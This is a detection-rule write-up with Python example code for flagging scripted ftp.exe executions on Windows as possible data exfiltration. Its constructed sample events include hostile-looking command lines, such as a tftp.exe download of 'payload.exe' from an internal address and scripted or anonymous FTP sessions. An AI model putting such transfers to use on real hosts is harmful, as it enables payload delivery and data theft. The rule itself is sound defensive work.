
Summary
This detection rule identifies potential data exfiltration over FTP (File Transfer Protocol) on Windows hosts. It uses EDR (Endpoint Detection and Response) process-execution telemetry to look for launches of the Windows FTP client (ftp.exe) with command-line parameters, which point to a scripted or automated transfer rather than an interactive session. Adversaries use FTP both to bring tools and payloads onto a host and to move sensitive data off it. For each matching execution the rule records the timestamp, host, user, command line and parent process so that analysts can investigate unusual file-transfer activity. Threat actors associated with this behaviour include APT35 and Karakurt, and related software seen in operations includes Agent Tesla and BianLian. A regex pattern refines the match so that only certain command-line invocations of FTP are flagged for review rather than every execution of the client. Because ftp.exe is a built-in, signed Windows binary, legitimate administrative use will also match; baseline the parent processes, users and script paths seen in your environment before alerting on every hit.
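The matching logic described above, run over a handful of constructed EDR process-creation events, as an added example that is not the rule's own query. The event field names (_time, dest, user, process_name, process, parent_process_name), the regex and the sample events are assumptions made here for illustration; the rule only states that it flags ftp.exe executions with parameters and refines them with a regex. The regex's leading boundary is the detail a practitioner cares about: an unanchored "ftp" substring would also match tftp.exe and sftp.exe, which are different binaries with different detection stories. The ftp.exe switches annotated for triage (-s:, -A, -n, -i) are real, documented client switches.

```python
import re
from dataclasses import dataclass, field

# ftp.exe launched with at least one argument. The boundary class before
# "ftp" stops tftp.exe / sftp.exe from matching; the optional quote handles
# full-path invocations such as "C:\Windows\System32\ftp.exe" -A host.
# (Assumed regex; the rule's actual pattern is not reproduced on the page.)
FTP_WITH_ARGS = re.compile(
    r'(?:^|[\\/"\s])ftp(?:\.exe)?"?\s+(?P<args>\S.*)$', re.IGNORECASE
)

# Documented ftp.exe switches worth calling out during triage.
# Matched case-sensitively: -A (anonymous) and -a (bind any interface) differ.
SWITCH_NOTES = {
    "-s:": "scripted session, commands read from a file (non-interactive)",
    "-A": "anonymous login",
    "-n": "auto-login suppressed",
    "-i": "interactive prompting off (bulk mget/mput)",
}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"_time": "2024-02-09T10:01:12Z", "dest": "WS01", "user": "CORP\\alice",
     "process_name": "ftp.exe",
     "process": "ftp.exe -s:C:\\Users\\alice\\AppData\\Local\\Temp\\up.txt",
     "parent_process_name": "cmd.exe"},
    {"_time": "2024-02-09T10:02:45Z", "dest": "WS02", "user": "CORP\\bob",
     "process_name": "ftp.exe", "process": "ftp.exe",        # bare interactive launch
     "parent_process_name": "explorer.exe"},
    {"_time": "2024-02-09T10:03:30Z", "dest": "WS03", "user": "CORP\\carol",
     "process_name": "tftp.exe",                              # different LOLBin
     "process": "tftp.exe -i 10.0.0.5 GET payload.exe",
     "parent_process_name": "powershell.exe"},
    {"_time": "2024-02-09T10:04:02Z", "dest": "WS01", "user": "CORP\\alice",
     "process_name": "cmd.exe",                               # parent; child gets its own event
     "process": "cmd.exe /c ftp -s:up.txt",
     "parent_process_name": "explorer.exe"},
    {"_time": "2024-02-09T10:05:19Z", "dest": "SRV01", "user": "CORP\\svc_backup",
     "process_name": "ftp.exe",
     "process": '"C:\\Windows\\System32\\ftp.exe" -A -n ftp.example.net',
     "parent_process_name": "powershell.exe"},
]


@dataclass
class Hit:
    time: str
    dest: str
    user: str
    parent: str
    process: str
    notes: list = field(default_factory=list)


def matches_ftp_commandline(cmdline: str) -> bool:
    """True when the command line is an ftp/ftp.exe invocation with arguments."""
    return FTP_WITH_ARGS.search(cmdline) is not None


def detect_ftp_with_args(events):
    """Return one Hit per ftp.exe execution that carries command-line parameters.

    Requires process_name == ftp.exe so a parent shell whose own command line
    mentions ftp is not double-counted; the ftp.exe child is its own event.
    """
    hits = []
    for ev in events:
        if ev.get("process_name", "").lower() != "ftp.exe":
            continue
        m = FTP_WITH_ARGS.search(ev.get("process", ""))
        if not m:
            continue  # bare interactive launch: not flagged
        tokens = m.group("args").split()
        notes = [note for sw, note in SWITCH_NOTES.items()
                 if any(tok.startswith(sw) for tok in tokens)]
        hits.append(Hit(ev["_time"], ev["dest"], ev["user"],
                        ev["parent_process_name"], ev["process"], notes))
    return hits


if __name__ == "__main__":
    for h in detect_ftp_with_args(SAMPLE_EVENTS):
        print(f"{h.time} {h.dest} {h.user} parent={h.parent}")
        print(f"  {h.process}")
        for n in h.notes:
            print(f"  note: {n}")
```

Of the five constructed events only two are flagged: the scripted -s: transfer spawned from cmd.exe, and the anonymous (-A -n) session launched from PowerShell. The bare ftp.exe launch, the tftp.exe download and the cmd.exe parent line are all left alone, which is the behaviour the rule's regex refinement is meant to produce.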
Categories
- Endpoint
- Windows
Data Sources
- Process
- Logon Session
- File
ATT&CK Techniques
- T1071.002 (Application Layer Protocol: File Transfer Protocols)
- T1048 (Exfiltration Over Alternative Protocol)
Created: 2024-02-09